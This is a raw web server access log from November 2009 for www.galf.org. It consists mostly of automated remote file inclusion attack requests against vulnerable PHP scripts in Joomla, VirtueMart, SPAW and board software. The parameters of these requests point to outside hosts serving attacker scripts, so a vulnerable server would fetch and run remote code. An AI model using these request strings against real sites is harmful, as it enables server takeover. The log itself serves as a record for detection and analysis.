70.38.31.183 - - [22/Nov/2009:23:27:43 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [22/Nov/2009:23:27:44 -0800] "GET /logs/access_090622.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:27:49 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:27:49 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:27:49 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.111.29 - - [22/Nov/2009:23:27:52 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.111.29 - - [22/Nov/2009:23:27:53 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:28:00 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:28:00 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:28:04 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:28:56 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:28:56 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:28:56 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.30 - - [22/Nov/2009:23:30:04 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
66.102.237.81 - - [22/Nov/2009:23:31:20 -0800] "GET /logs/access_090921.log/?CLPATH=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [22/Nov/2009:23:31:20 -0800] "GET /logs/?CLPATH=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [22/Nov/2009:23:31:20 -0800] "GET /?CLPATH=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:23:31:49 -0800] "GET /logs//bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:23:31:49 -0800] "GET /logs/access_090525.log//bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:23:31:49 -0800] "GET /bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:32:21 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:33:08 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:33:32 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [22/Nov/2009:23:35:10 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:35:38 -0800] "GET /logs/access_090713.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:23:37:24 -0800] "GET /bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.63.60.50 - - [22/Nov/2009:23:37:24 -0800] "GET /logs//bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.63.60.50 - - [22/Nov/2009:23:37:25 -0800] "GET /logs/access.log//bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.63.60.50 - - [22/Nov/2009:23:37:28 -0800] "GET /logs/access_091102.log//bbs//skin/gallery/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:38:39 -0800] "GET /logs/access_090713.log/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [22/Nov/2009:23:39:38 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.71.237.150 - - [22/Nov/2009:23:39:39 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.71.237.150 - - [22/Nov/2009:23:39:39 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:40:47 -0800] "GET /logs/access_090525.log/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:41:29 -0800] "GET /logs/access_090622.log/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:42:08 -0800] "GET /logs/access_090420.log//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:42:16 -0800] "GET /logs/access_090720.log//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:14 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:14 -0800] "GET /logs/access_090504.log////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:15 -0800] "GET /logs////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:29 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:29 -0800] "GET /logs////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:30 -0800] "GET /logs/access_090504.log////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:43:59 -0800] "GET /logs/access_091102.log////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:44:12 -0800] "GET /logs/access_091102.log////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:44:35 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:44:35 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:44:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:45:43 -0800] "GET /logs/access_090713.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [22/Nov/2009:23:45:48 -0800] "GET /logs/access_090921.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:46:03 -0800] "GET /logs/access_090713.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:46:05 -0800] "GET /logs/access_090713.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:46:21 -0800] "GET /logs/access_090914.log//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:46:29 -0800] "GET /logs/access_090713.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:46:36 -0800] "GET /logs/access_090713.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:46:49 -0800] "GET /logs/access_090713.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:47:41 -0800] "GET /skin/gallery/setup.php?dir=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:48:46 -0800] "GET /logs//skin/gallery/setup.php?dir=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:48:46 -0800] "GET /logs/access_090608.log//skin/gallery/setup.php?dir=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:49:04 -0800] "GET /logs/access_090504.log%20%20////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:49:43 -0800] "GET /logs/access_091102.log%20%20////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:50:00 -0800] "GET /logs/access_090504.log%20%20////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:50:38 -0800] "GET /logs/access_091102.log%20%20////modules/xfsection/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:51:18 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:10 -0800] "GET /logs/access_091102.log%20%20/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:10 -0800] "GET /logs/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:11 -0800] "GET /errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:20 -0800] "GET /logs/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:21 -0800] "GET /logs/access_091102.log%20%20/errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [22/Nov/2009:23:55:21 -0800] "GET /errors.php?error=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.32.68.153 - - [22/Nov/2009:23:59:48 -0800] "GET /logs/access_090622.log/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.153 - - [22/Nov/2009:23:59:48 -0800] "GET /logs/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.153 - - [22/Nov/2009:23:59:48 -0800] "GET /index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.153 - - [22/Nov/2009:23:59:54 -0800] "GET /logs/access_091102.log/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:03:46 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:03:46 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:03:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:04:46 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:04:46 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:04:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:05:09 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:05:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:05:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:08:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:08:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.141.103.61 - - [23/Nov/2009:00:08:40 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:51 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:51 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:53 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:55 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:55 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:09:56 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:33 -0800] "GET /include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:33 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:33 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:50 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:10:51 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:12:22 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:12:39 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:13:16 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:13:49 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:13:49 -0800] "GET /logs/access_090817.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [23/Nov/2009:00:13:49 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:02 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:02 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:03 -0800] "GET /include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:11 -0800] "GET /logs/access_090504.log//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:11 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:11 -0800] "GET /include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [23/Nov/2009:00:14:40 -0800] "GET /logs/access_090622.log//include/admin.lib.inc.php?site_path=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:00:16:40 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:16:59 -0800] "GET /logs/access_091102.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:17:18 -0800] "GET /logs/access_091102.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [23/Nov/2009:00:17:21 -0800] "GET /logs/access_091102.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:00:20:17 -0800] "GET /logs/access.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:00:20:17 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
